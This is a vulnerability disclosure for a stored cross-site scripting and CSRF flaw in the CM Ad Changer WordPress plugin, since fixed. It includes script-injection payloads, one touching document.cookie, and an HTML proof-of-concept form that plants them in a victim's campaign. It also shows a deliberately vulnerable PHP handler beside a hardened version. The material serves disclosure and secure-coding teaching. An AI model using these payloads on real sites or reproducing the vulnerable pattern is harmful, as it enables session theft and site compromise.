#Exploit Title: CM Ad Changer Plugin XSS
#Date: 9/6/2016
#Exploit Author: Aaditya Purani
#Author Homepage: https://aadityapurani.com
#Vendor Homepage: https://ad-changer.cminds.com
#Software Link: https://downloads.wordpress.org/plugins/cm-ad-changer.zip (Updated)
#Version: 1.7.7
#Tested on: WordPress 4.5.2
#Category: Web applications
Description:
A stored cross-site scripting vulnerability was reported by me to CM Ad Plugins, under which an unprivileged user can trigger a stored XSS to perform a malicious action, or any attacker could send a crafted link which can trigger the stored XSS.
Steps to Reproduce:
1) Go to CM Ad Changer -> Campaigns
2) Create a campaign. Enter whatever you want in Campaign Settings; in the next tab, "Campaign Banners", select an image under Campaign Images and enter one of these payloads in Banner Title:
</script><script>confirm(/aaditya/)</script>
</script><script>confirm(document.cookie)</script>
3) Click Save. The payload triggers every time you return to the campaign page.
An attacker can host an HTML page containing the following form. A logged-in user who clicks the button submits it with their own session and stores the payload in the target campaign:
<html>
<body>
<h1> Click The button below. POC By Aaditya Purani:: CM AD Changer 1.7.7 </h1>
<!-- Replace {TARGET_ID} with the victim campaign's ID and set the hidden
     campaign_id field below to the same value. yourpicvalue.jpg must be an
     image already uploaded to that campaign. -->
<form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=cmac_campaigns&action=edit&campaign_id={TARGET_ID}" method="POST">
  <input type="hidden" name="campaign_id" value="1" />
  <input type="hidden" name="title" value="Hacked by Aaditya" />
  <input type="hidden" name="comment" value="" />
  <input type="hidden" name="link" value="" />
  <input type="hidden" name="status" value="on" />
  <input type="hidden" name="banner_display_method" value="selected" />
  <input type="hidden" name="banner_filename[]" value="yourpicvalue.jpg" />
  <!-- The stored XSS payload; the leading </script> closes whatever script
       element the title is later echoed into. -->
  <input type="hidden" name="banner_title[]" value="</script><script>confirm(/aaditya/)</script>" />
  <input type="hidden" name="banner_title_tag[]" value="" />
  <input type="hidden" name="banner_tag[]" value="" />
  <input type="hidden" name="banner_link[]" value="" />
  <input type="hidden" name="banner_weight[]" value="0" />
  <input type="hidden" name="selected_banner" value="yourpicvalue.jpg" />
  <input type="hidden" name="submit" value="Save" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>
This stores the payload via the banner_title[] parameter, and the stored XSS fires each time the campaign's edit page is loaded.
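The leading </script> in the payload only makes sense if the banner title is echoed inside an inline script element: the HTML tokenizer ends a script element at the first literal "</script>" regardless of JavaScript quoting, so everything after it is parsed as new markup. The following is an added illustration, not CM Ad Changer's code: a hypothetical handler that reproduces both weaknesses the PoC relies on (a save action with no nonce check, and a title echoed into a script block unescaped) next to a hardened version. The function names, the option name cmac_example_banner_titles, the nonce action/field names and the manage_options capability are all assumptions; only the WordPress API calls are real.

```php
<?php
// Added example, not the plugin's code. Hypothetical names throughout.

// --- Vulnerable pattern (assumed) ---
// 1. No nonce or capability check: a cross-site POST sent from a logged-in
//    user's browser (the HTML form above) is accepted.
// 2. banner_title[] is stored raw and later echoed inside a <script> block.
function cmac_save_campaign_vulnerable() {
    $titles = isset( $_POST['banner_title'] ) ? (array) $_POST['banner_title'] : array();
    update_option( 'cmac_example_banner_titles', $titles ); // stored unescaped
}

function cmac_render_banner_titles_vulnerable() {
    $titles = get_option( 'cmac_example_banner_titles', array() );
    echo "<script>\nvar bannerTitles = [];\n";
    foreach ( $titles as $i => $title ) {
        // With $title = </script><script>confirm(document.cookie)</script>
        // the browser closes this script element at the embedded </script>
        // and runs the attacker's script as a second script element.
        echo "bannerTitles[" . (int) $i . "] = '" . $title . "';\n";
    }
    echo "</script>\n";
}

// --- Hardened version ---
function cmac_save_campaign_fixed() {
    if ( ! current_user_can( 'manage_options' ) ) {          // capability assumed
        wp_die( 'Insufficient privileges' );
    }
    // Rejects the cross-site form: an attacker's page cannot read the nonce.
    check_admin_referer( 'cmac_save_campaign', 'cmac_nonce' );

    $titles = isset( $_POST['banner_title'] ) ? (array) $_POST['banner_title'] : array();
    $titles = array_map( 'sanitize_text_field', wp_unslash( $titles ) );
    update_option( 'cmac_example_banner_titles', $titles );
}

function cmac_render_banner_titles_fixed() {
    $titles = get_option( 'cmac_example_banner_titles', array() );
    // wp_json_encode() escapes "/" as "\/" (PHP's json_encode default), so the
    // output never contains a literal "</script>"; JSON_HEX_TAG additionally
    // turns "<" and ">" into \u003C and \u003E. Quotes are escaped as well,
    // so the value always stays a JavaScript string.
    echo "<script>\nvar bannerTitles = "
        . wp_json_encode( array_values( $titles ), JSON_HEX_TAG )
        . ";\n</script>\n";
}

// Where a title is rendered as HTML text rather than inside a script,
// escape for that context instead.
function cmac_render_banner_title_html( $title ) {
    return '<span class="banner-title">' . esc_html( $title ) . '</span>';
}

// The campaign form must emit the nonce that the save handler checks.
function cmac_campaign_form_nonce_field() {
    wp_nonce_field( 'cmac_save_campaign', 'cmac_nonce' );
}
```

The nonce removes the cross-site vector shown in the PoC page; the context-correct encoding removes the stored XSS itself. Both are needed: a nonce alone still lets a user with edit access store script that runs in every other editor's browser, and encoding alone still lets an attacker rewrite a victim's campaign.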
This has been fixed; version 1.7.8 was released on 9 June 2016.
Visit Here: https://ad-changer.cminds.com/cm-ad-changer-plugin-free-edition-release-notes
---------Timeline----------
1st June : Reported to Vendor Creative Minds
3rd June: Additional Information provided
6th June: Vendor team was able to reproduce
7th June: Fixed, and confirmed by me
9th June: Fix publicly released and changelog updated (1.7.8)
Regards,
Aaditya Purani